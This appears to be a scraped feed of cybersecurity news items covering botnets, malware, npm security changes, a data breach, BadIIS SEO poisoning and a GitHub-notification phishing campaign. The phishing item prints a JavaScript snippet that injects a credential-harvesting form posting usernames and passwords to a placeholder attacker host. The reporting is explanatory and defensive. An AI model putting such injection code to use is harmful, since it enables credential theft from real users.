-
Cybersecurity researchers have disclosed details of a new botnet that customers can rent access to conduct distributed denial-of-service (DDoS) attacks against targets of interest. The ShadowV2 botnet, according to Darktrace, predominantly targets misconfigured Docker containers on Amazon Web Services (AWS) cloud servers to deploy a Go-based malware that turns infected systems into attack nodes
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Zloader, a sophisticated Zeus-based modular trojan that first emerged in 2015, has undergone a significant transformation from its original banking-focused purpose to become a dangerous tool for initial access and ransomware deployment in corporate environments. Following an almost two-year hiatus, this malware reemerged in September 2023 with substantial enhancements to its obfuscation techniques, domain generation […]
The post Zloader Malware Used as Gateway for Ransomware Deployment in Corporate Networks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Recent High-profile supply‐chain attacks have exposed critical weaknesses in package registry security, prompting GitHub to roll out a suite of defenses designed to harden the npm ecosystem.
“GitHub Enhances npm’s security with strict authentication, granular tokens, and trusted publishing” marks the latest milestone in defending open source against account takeovers and malicious post-install payloads.
Account Takeovers and Post-Install Malware
In mid-September 2025, the npm registry was rocked by the Shai-Hulud attack, a self-replicating worm that leveraged compromised maintainer credentials to inject malicious JavaScript into widely used packages.
By embedding post-install scripts that exfiltrated environment variables and API secrets, the worm threatened to create a persistent backdoor across thousands of developer machines.
Attackers deployed Indicators of Compromise (IoCs) that included obfuscated PowerShell one-liners and rogue script tags to harvest tokens and credentials.
Over 500 infected modules were unpublished within 24 hours, and npm blocked uploads containing the worm’s IoCs.
This breach underscores how malicious actors exploit weak authentication and overly permissive tokens. Without multi-factor enforcement or scoped tokens, a single stolen classic token can become a foothold for escalating privileges, distributing malware, or pivoting deeper into critical projects.
Security Measures to Prevent Compromise
To counter token abuse and prevent future supply-chain compromise, GitHub is introducing three core measures:
Strict authentication
All npm publish operations will require enforced two-factor authentication (2FA) using FIDO2/WebAuthn. The legacy Time-based One-Time Password (TOTP) method will be deprecated, eliminating vulnerabilities associated with shared seed values or SMS fallback.
Granular tokens
Developers will generate short-lived granular access tokens with scoped permissions for example, read:packages or publish:package-name—and a maximum lifetime of seven days.
Classic tokens will be deprecated entirely, removing the risk of unlimited-scope credentials persisting indefinitely.
Trusted publishing
Leveraging OpenSSF’s Trusted Publishers specification, maintainers can bind package publication to established identity providers via OIDC.
This eliminates the need to embed API tokens in CI/CD pipelines, reducing exposure during build processes.
Additional measures include disabling token bypass for local publishing, expanding the roster of supported identity providers, and publishing migration guides to integrate these changes seamlessly.
GitHub plans a phased rollout with configurable enforcement windows, allowing organizations to adapt CI workflows and update automation scripts without disruption.
As the open source ecosystem scales, security remains a collective responsibility. By adopting FIDO2-based 2FA, migrating to granular tokens, and embracing trusted publishing, npm maintainers can greatly reduce the attack surface for supply-chain threats.
These enhancements not only protect individual projects but also reinforce the integrity of the software industry’s foundational infrastructure.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post GitHub Enhances NPM’s Security with Strict Authentication, Granular Tokens, and Trusted Publishing appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
These fake online speedtest applications prey on users seeking to measure their internet performance, yet they harbor hidden payloads that compromise system integrity and privacy. Much like the previously analyzed Fake Manual Reader and Finder software, these imposters leverage packers, obfuscated JavaScript, and persistence mechanisms to execute arbitrary code and exfiltrate sensitive data. On September […]
The post Beware of Fake Online Speedtest Apps with Hidden JavaScript Code appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A critical vulnerability in SolarWinds Web Help Desk (WHD) could allow attackers to escalate privileges and execute arbitrary code on affected systems. SolarWinds has released Web Help Desk 12.8.7 Hotfix 1 to address CVE-2025-26399, a deserialization flaw in the AjaxProxy component. Administrators are urged to install the hotfix immediately to prevent exploitation and protect management […]
The post SolarWinds Web Help Desk Vulnerability Enables Privilege Escalation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Digital Charging Solutions GmbH (DCS), a leading provider of white-label charging services for automotive OEMs and fleet operators, has confirmed a data breach affecting a limited number of its customers.
DCS disclosed that unauthorized access to personal data occurred in the course of its customer-support processes. The incident was detected through irregularities in log data and immediately triggered an extensive forensic analysis.
On September 19, 2025, DCS detected anomalies in system logs indicating that a third-party service provider had accessed DCS customer records without valid authorization.
Customers’ Personal Data Exposed
This service provider, authorized for customer support operations, is contractually permitted to view limited customer data but is bound by strict data privacy protocols.
Initial forensic analysis revealed isolated cases where names and email addresses were accessed outside the intended support portal.
Data Breach Notification No complete payment data or financial transaction records were stored in these systems, as DCS employs tokenization and point-to-point encryption to segregate billing data from support databases.
Extensive IT-forensic analysis, spearheaded by external cybersecurity experts, is underway. Investigators have preserved volatile memory snapshots and conducted full disk imaging of affected endpoints to trace the intrusion vectors.
Preliminary root-cause analysis suggests insider misuse rather than an external exploit, though log-correlation across security information and event management (SIEM) systems is ongoing to rule out lateral movement or privileged escalation.
Evidence of unauthorized API calls and atypical SSH sessions to the customer-support database was recorded, prompting immediate revocation of all service-provider credentials.
Mitigation
DCS has implemented multiple mitigation measures, including forced rotation of access tokens, implementation of multi-factor authentication (MFA) for all third-party users, and enhanced database auditing via Structured Query Language (SQL) anomaly detection rules.
The company has also integrated a Security Orchestration, Automation, and Response (SOAR) platform to automate threat-hunt playbooks and streamline incident-response workflows.
All affected customers in the single-digit range received direct notifications in compliance with GDPR Article 33, and the relevant Data Protection Authority has been informed.
Customers can continue to charge their EVs without disruption. Billing processes remain fully operational, as the invoicing subsystem is isolated behind a dedicated payment gateway employing Transport Layer Security (TLS) 1.3 encryption.
DCS has recommended that users remain vigilant, update passwords where reused across services, and report any suspicious communications.
The breach underscores the importance of zero-trust architecture and continuous monitoring of third-party risk in the electromobility sector.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post EV Charging Provider Confirm Data Breach – Customers Personal Data Exposed appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A sophisticated cyber campaign, dubbed “Operation Rewrite,” is actively hijacking Microsoft Internet Information Services (IIS) web servers to serve malicious content through a technique known as search engine optimization (SEO) poisoning.
Palo Alto Networks uncovered the operation in March 2025, attributing it with high confidence to a Chinese-speaking threat actor who uses a malicious IIS module known as BadIIS.
The campaign’s primary goal is financial gain by manipulating search engine results to redirect unsuspecting users to unwanted websites, such as gambling and pornography platforms.
The attackers compromise legitimate, high-reputation websites, turning them into unwitting conduits for their malicious activities.
BadIIS Malware and SEO Poisoning
At the heart of this operation is BadIIS, a malicious native module for Microsoft’s IIS web server software. First identified in 2021, these modules integrate directly into the web server’s core processes, granting them high-level privileges.
This deep integration allows the malware to intercept, inspect, and modify all incoming and outgoing web traffic. Attackers leverage this control to inject malicious code, redirect users, and steal sensitive information without being easily detected.
The attackers use BadIIS to conduct SEO poisoning. Instead of building new malicious websites, which are difficult to rank in search engines, they compromise established sites that already have a good reputation.
By injecting popular search keywords into the compromised site’s content, they trick search engines like Google and Bing into ranking the site for a wide range of unrelated queries.
The “Operation Rewrite” campaign unfolds in two distinct phases designed to first deceive search engines and then ensnare human victims.
- The Lure Phase: The attack begins when a search engine crawler (like Googlebot) visits a compromised server. The BadIIS module detects the crawler by inspecting its
User-Agentheader. It then communicates with a command-and-control (C2) server to fetch keyword-rich, poisoned content. This content is served only to the crawler, causing the search engine to index the legitimate website for popular but irrelevant terms. Analysis shows a specific focus on East and Southeast Asia, with keywords for Vietnamese search engines and terms related to illegal soccer streaming services.
Attack Chain - The Trap Phase: Once the search results are poisoned, the trap is set. When a user clicks on the malicious search result, the BadIIS module identifies them as a human victim by checking the
Refererheader. Instead of showing the expected webpage, the module contacts the C2 server again to fetch a redirect link to a scam website. The compromised server acts as a reverse proxy, seamlessly sending the victim to the attacker-controlled destination.
Palo Alto Networks has linked this activity cluster, tracked as CL-UNK-1037, to a Chinese-speaking threat group. The name “Operation Rewrite” stems from the Pinyin transliteration “chongxiede” (重写), meaning “rewrite,” which was found as an object name in the malware’s code.
Rewrite Operation Further investigation revealed additional linguistic evidence, including code comments written in simplified Chinese characters.
The group’s toolkit is not limited to the native BadIIS module. The investigation uncovered several variants, demonstrating the actor’s adaptability.
These include lightweight ASP.NET page handlers, managed .NET IIS modules, and an all-in-one PHP script, all designed to achieve the same SEO poisoning goals through different technical means.
Researchers noted significant overlaps in infrastructure and code design with a publicly tracked threat cluster known as “Group 9” and tactical similarities to the “DragonRank” campaign, suggesting a connection within a broader ecosystem of threat actors.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and set CSN as a Preferred Source in Google.
The post Hackers Hijacking IIS Servers Using Malicious BadIIS Module to Serve Malicious Content appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
- The Lure Phase: The attack begins when a search engine crawler (like Googlebot) visits a compromised server. The BadIIS module detects the crawler by inspecting its
-
Cloud environments rely on the Instance Metadata Service (IMDS) to provide virtual machines with temporary credentials and essential configuration data. IMDS allows applications to securely retrieve credentials without embedding secrets in code or configuration files. However, threat actors have found ways to misuse this convenience, turning IMDS into a springboard for stealing credentials, moving laterally, […]
The post Hackers Abuse IMDS Service for Cloud Initial Access appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Open source software powers much of today’s technology, enabling developers around the world to build and share tools, libraries, and applications. However, the same openness that drives innovation also presents serious security challenges. Attackers regularly target package registries like npm to compromise accounts and inject malicious code. In response, GitHub has announced significant updates to […]
The post GitHub Introduces npm Security with Stronger Authentication and Trusted Publishing appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
In recent weeks, security researchers have uncovered an elaborate phishing campaign that leverages legitimate GitHub notification mechanisms to deliver malicious content.
Victims receive seemingly authentic repository alerts, complete with real-looking commit messages and collaborator updates. Upon closer inspection, the notification headers reveal altered sender addresses and obfuscated links.
The campaign’s sophistication has allowed it to slip past many email gateways, leading to a surge in compromised credentials among developers and IT staff.
Initial reports emerged when multiple open-source maintainers reported unexpected password resets and unauthorized repository forks. H4x0r.DZ identified the malware variant responsible for intercepting GitHub webhook notifications and appending phishing payloads.
Scammers are abusing @github <notifications@github.com> Email system to deliver phishing emails pic.twitter.com/yfnzyJr28W
— H4x0r.DZ
(@h4x0r_dz) September 22, 2025Unlike typical phishing emails, these messages maintain valid DKIM and SPF records by exploiting misconfigurations in third-party GitHub Apps.
Recipients clicking the embedded link are redirected through a chain of URL shorteners before landing on a credential-harvesting page.
Analysis of the phishing emails shows that the malware injects custom HTML forms into the GitHub notification template.
.webp)
Notification form (Source – X) The form’s action attribute points to a URL under the attacker’s control, while JavaScript code captures the entered credentials and relays them via an AJAX POST request.
Infection Mechanism via Webhook Manipulation
The core infection vector hinges on compromised GitHub Apps with overly broad webhook permissions.
Attackers first identify popular repositories that allow external Apps to subscribe to push events.
By registering a malicious App under a plausible name, they gain event subscriptions and acquire a webhook secret.
The attacker’s server validates incoming JSON payloads using the secret, then modifies the “pusher” field to insert malicious HTML before forwarding the notification to GitHub’s email service.
A simplified version of the injection logic appears below:-
function modifyPayload(payload) { let template = payload. Body; const phishingForm = `<form action="https://evil.example.com/collect" method="POST"> <input name="username" placeholder="User Name"/> <input type="password" name="password" placeholder="Password"/> <button type="submit">Confirm</button> </form>`; payload. Body = template.replace('</div>', `${phishingForm}</div>`); return payload; }While the webhook injection flow traces the end-to-end manipulation of webhook payloads. Once credentials are harvested, attackers can access private repositories, escalate privileges, and deploy further malware.
Detection strategies should focus on monitoring unusual webhook registrations, validating App permission scopes, and inspecting outbound email content for embedded forms.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Hackers Abusing GitHub Notifications to Deliver Phishing Emails appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
